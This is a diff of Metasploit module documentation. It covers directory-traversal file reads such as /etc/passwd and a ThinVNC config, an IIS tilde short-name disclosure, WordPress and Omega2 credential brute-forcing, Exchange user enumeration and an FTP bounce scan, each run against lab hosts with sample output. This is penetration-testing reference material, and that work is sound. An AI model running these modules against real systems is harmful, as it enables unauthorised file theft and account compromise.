-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application
 
-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps
 
   1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

documentation/modules/auxiliary/scanner/http/onion_omega2_login.md

@@ -16,7 +16,7 @@ The onion_omega2_login module is used to brute-force credentials for Onion Omage
 4. Do: `use auxiliary/scanner/http/onion_omega2_login`
 5. Do: `set RHOSTS 192.168.3.1`
 6. Do: `set USERPASS_FILE <user pass dictionary>`
-    - username and password seperated by space and one pair per line.
+    - username and password separated by space and one pair per line.
 7. Do: `run`
 
 Sample userpass file:

documentation/modules/auxiliary/scanner/http/rips_traversal.md

@@ -12,7 +12,7 @@
   * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)
 
 
-## Verification
+## Verification Steps
 
   1. Start `msfconsole`
   2. `use auxiliary/scanner/http/rips_traversal`

documentation/modules/auxiliary/scanner/http/springcloud_traversal.md

@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application
 
 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.
 
-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
 
-## Verification
+## Verification Steps
 
 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799

documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md

@@ -0,0 +1,38 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in ThinVNC
+  versions 1.0b1 and prior which allows unauthenticated users to retrieve
+  arbitrary files, including the ThinVNC configuration file.
+
+## Vulnerable Application
+
+  This module has been tested successfully on ThinVNC versions 1.0b1
+  and "ThinVNC_Latest" (2018-12-07).
+
+  ThinVNC is available on [Sourceforge](https://sourceforge.net/projects/thinvnc/files/).
+
+## Verification Steps
+
+  1. `./msfconsole`
+  2. `use auxiliary/scanner/http/thinvnc_traversal`
+  3. `set rhosts <rhost>`
+  4. `run`
+
+## Scenarios
+
+  ### ThinVNC version 1.0b1 on Windows XP SP3
+
+  ```
+  msf5 > use auxiliary/scanner/http/thinvnc_traversal 
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123
+  rhosts => 172.16.123.123
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > run
+
+  [+] File ThinVnc.ini saved in: /root/.msf4/loot/20191017033828_default_172.16.123.123_thinvnc.traversa_713640.txt
+  [+] Found credentials: admin:admin
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > 
+  ```
+

documentation/modules/auxiliary/scanner/http/title.md

@@ -0,0 +1,111 @@
+## Description
+
+Generates a GET request to the provided web servers and returns the server header, HTML title attribute and location header (if set). This is useful for rapidly identifying interesting web applications en mass.
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/http/title`
+  2. Do: `set rhosts [ips]`
+  3. Do: `run`
+
+## Options
+
+**SHOW_TITLES**
+
+If set to `false`, will not show the titles on the console as they are grabbed. Defaults to `true`.
+
+**STORE_NOTES**
+
+If set to `false`, will not store the captured information in notes. Use `notes -t http.title` to view. Defaults to `true`.
+
+## Scenarios
+
+### Apache/2.4.38 inside a Docker container
+
+  ```
+msf5 > use auxiliary/scanner/http/title
+msf5 auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf5 auxiliary(scanner/http/title) > run
+
+[+] [172.17.0.2:80] [C:200] [R:] [S:Apache/2.4.38 (Debian)] LOCAL TESTING
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```
+
+## Confirming using Burp Suite Community Edition
+
+### HTTP GET Request 
+
+```
+GET / HTTP/1.1
+Host: 172.17.0.2
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+```
+
+### Server Response
+
+```
+HTTP/1.1 200 OK
+Date: Wed, 16 Oct 2019 17:27:49 GMT
+Server: Apache/2.4.38 (Debian)
+X-Powered-By: PHP/7.2.23
+Content-Length: 68
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<html><head><title>LOCAL TESTING</title></head><body></body></html>
+```
+
+## Confirming using Nikto
+
+This will only identify server version and Location header, not HTML title.
+
+```
+nikto -host http://172.17.0.2 -Plugin headers
+
+- Nikto v2.1.6
+---------------------------------------------------------------------------
++ Target IP:          172.17.0.2
++ Target Hostname:    172.17.0.2
++ Target Port:        80
++ Start Time:         2019-10-16 19:30:55 (GMT2)
+---------------------------------------------------------------------------
++ Server: Apache/2.4.38 (Debian)
++ Retrieved x-powered-by header: PHP/7.2.23
+```
+
+## Confirming using NMAP
+
+Utilizing the [http-title](https://nmap.org/nsedoc/scripts/http-title.html) NMAP script.
+
+```
+# nmap -sV -p80 --script http-title 127.0.0.1
+Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 21:11 EDT
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000049s latency).
+
+PORT   STATE SERVICE VERSION
+80/tcp open  http    Apache httpd 2.4.41 ((Debian))
+|_http-server-header: Apache/2.4.41 (Debian)
+|_http-title: Apache2 Debian Default Page: It works
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
+```
+
+## Confirming using CURL
+
+This will use `grep` to filter for just the content between the title tags.
+
+```
+# curl -s 127.0.0.1:80 | grep \<title\>
+<title>Apache2 Debian Default Page: It works</title>
+```

documentation/modules/auxiliary/scanner/http/totaljs_traversal.md

@@ -34,11 +34,15 @@ Affecting total.js package, versions:
 
 ## Options
 
-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**
 
-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios
 
 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
 

documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085

documentation/modules/auxiliary/scanner/http/wordpress_scanner.md

@@ -0,0 +1,101 @@
+## Description
+
+Detects Wordpress installations and their version number.
+
+
+## Vulnerable Application
+
+### Setup using Docksal
+Install [Docksal](https://docksal.io/)
+
+Create a new WordPress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wordpress_sanner```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```run```
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_scanner
+msf5 auxiliary(scanner/http/wordpress_scanner) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_scanner) > run
+
+[*] Trying 192.168.64.100
+[+] 192.168.64.100 running Wordpress 5.2
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_scanner) > 
+
+```

documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md

@@ -0,0 +1,162 @@
+## Vulnerable Application
+
+  This module attempts to authenticate against a Wordpress-site (via 
+  XMLRPC) using username and password combinations indicated by the 
+  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+### Setup using Docksal
+
+Install [Docksal](https://docksal.io/)
+
+Create a new WordPress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wordpress_xmlrpc_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```set USERNAME [user]```
+5. Do: ```set PASSWORD [pass]```
+6. Do: ```run```
+
+## Options
+
+**USERNAME**
+
+A specific username to authenticate as
+
+**USER_FILE**
+
+File containing usernames, one per line
+
+**PASSWORD**
+
+A specific password to authenticate with
+
+**PASS_FILE**
+
+File containing passwords, one per line
+
+**USERPASS_FILE**
+
+File containing users and passwords separated by space, one pair per line
+
+**USER_AS_PASS**
+
+Try the username as the password for all users (default: `false`)
+
+
+## Scenarios
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin
+USERNAME => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin
+PASSWORD => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run
+
+[*] 192.168.64.100:80    :/xmlrpc.php - Sending Hello...
+[+] 192.168.64.100:80 - XMLRPC enabled, Hello message received!
+[*] Starting XML-RPC login sweep...
+[+] 192.168.64.100:80 - Success: 'admin:admin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 
+
+```
+
+
+### Wordpress 5.2 with disabled or protected XMLRPC
+
+You may see this message also, if you forgot to set the `VHOST` option.
+
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin
+USERNAME => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin
+PASSWORD => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run
+
+[*] 192.168.64.100:80    :/xmlrpc.php - Sending Hello...
+[-] XMLRPC is not enabled! Aborting
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 
+
+```

documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md

@@ -0,0 +1,157 @@
+## Description
+
+This module exploits a directory traversal vulnerability in WordPress Plugin
+"DukaPress" version 2.5.3, allowing to read arbitrary files with the
+web server privileges.
+
+## Vulnerable Application
+
+### Wordpress with installed DukaPress <= 2.5.3
+* [https://wordpress.org/plugins/dukapress](https://wordpress.org/plugins/dukapress)
+* [Plugin v2.5.3](https://downloads.wordpress.org/plugin/dukapress.2.5.3.zip)
+
+### Setup using Docksal
+Install [Docksal](https://docksal.io/)
+
+Create a new Wordpress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+Download the wordpress plugin
+
+```
+cd msf-wp/wp-content/plugins
+wget https://downloads.wordpress.org/plugin/dukapress.2.5.3.zip
+unzip dukapress.2.5.3.zip
+
+```
+
+Login and click on DukaPress "Activate" Link
+
+```
+http://msf-wp.docksal/wp-admin/plugins.php
+user: admin
+pass: admin
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wp_dukapress_file_read```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```run```
+
+## Options
+
+**FILEPATH**
+
+The path to the file to read (default: `/etc/passwd`)
+
+**DEPTH**
+
+Traversal Depth (to reach the root folder) (default: `7`)
+
+
+## Scenarios
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+````
+msf5 > use auxiliary/scanner/http/wp_dukapress_file_read
+msf5 > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 > run
+
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/bin/false
+sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
+docker:x:1000:1000::/home/docker:/bin/bash
+
+[+] File saved in: /home/weh/.msf4/loot/20191009203058_default_192.168.64.100_dukapress.file_560342.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/msmail/exchange_enum.md

@@ -4,7 +4,7 @@ Exchange installations to enumerate email.
 
 Error-based user enumeration for Office 365 integrated email addresses
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`

documentation/modules/auxiliary/scanner/msmail/host_id.md

@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
 
 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`

documentation/modules/auxiliary/scanner/msmail/onprem_enum.md

@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
 
 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`

documentation/modules/auxiliary/scanner/portscan/ftpbounce.md

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Enumerate TCP services via the FTP bounce PORT/LIST method
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/portscan/ftpbounce`
+3. Do: `set BOUNCEHOST [ip]`
+4. Do: `set PORTS [number(s)]`
+5. Do: `set RHOSTS [ip]`
+6. Do: `set FTPUSER [user]`
+7. Do: `set FTPPASS [password]`
+8. Do: `run`
+
+## Scenarios
+
+Docker Usage:  `docker run -e "ADDED_FLAGS=-w -W -d -d" -e FTP_USER_NAME=bob -e FTP_USER_PASS=12345 -e FTP_USER_HOME=/home/bob stilliard/pure-ftpd`
+
+### PureFTPd and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/portscan/ftpbounce
+  msf auxiliary(scanner/portscan/ftpbounce) > set BOUNCEHOST 172.17.0.2
+    BOUNCEHOST => 172.17.0.2
+  msf auxiliary(scanner/portscan/ftpbounce) > set PORTS 8080
+    BOUNCEPORT => 8080
+  msf auxiliary(scanner/portscan/ftpbounce) > set RHOSTS 172.17.0.4
+    RHOSTS => 172.17.0.4
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPUSER bob
+    FTPUSER => bob
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPPASS 12345
+    FTPPASS => 12345
+  msf auxiliary(scanner/portscan/ftpbounce) > run
+
+    [+] 172.17.0.2:21 -  TCP OPEN 172.17.0.4:8080
+    [*] 172.17.0.2:21 - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+#### Manual Exploitation
+
+  ```
+  root@ubuntu:~# nmap -p 8080 -v -b bob:12345@172.17.0.2 172.17.0.4 -Pn
+
+    Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-25 20:34 UTC
+    Resolved FTP bounce attack proxy to 172.17.0.2 (172.17.0.2).
+    Initiating Parallel DNS resolution of 1 host. at 20:34
+    Completed Parallel DNS resolution of 1 host. at 20:34, 0.00s elapsed
+    Attempting connection to ftp://bob:12345@172.17.0.2:21
+    Connected:220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+    220-You are user number 1 of 5 allowed.
+    220-Local time is now 20:34. Server port: 21.
+    220-This is a private system - No anonymous login
+    220-This server supports FXP transfers
+    220-IPv6 connections are also welcome on this server.
+    220 You will be disconnected after 15 minutes of inactivity.
+    Login credentials accepted by FTP server!
+    Initiating Bounce Scan at 20:34
+    Discovered open port 8080/tcp on 172.17.0.4
+    Completed Bounce Scan at 20:34, 0.00s elapsed (1 total ports)
+    Nmap scan report for 172.17.0.4
+    Host is up.
+
+    PORT     STATE SERVICE
+    8080/tcp open  http-proxy
+  ```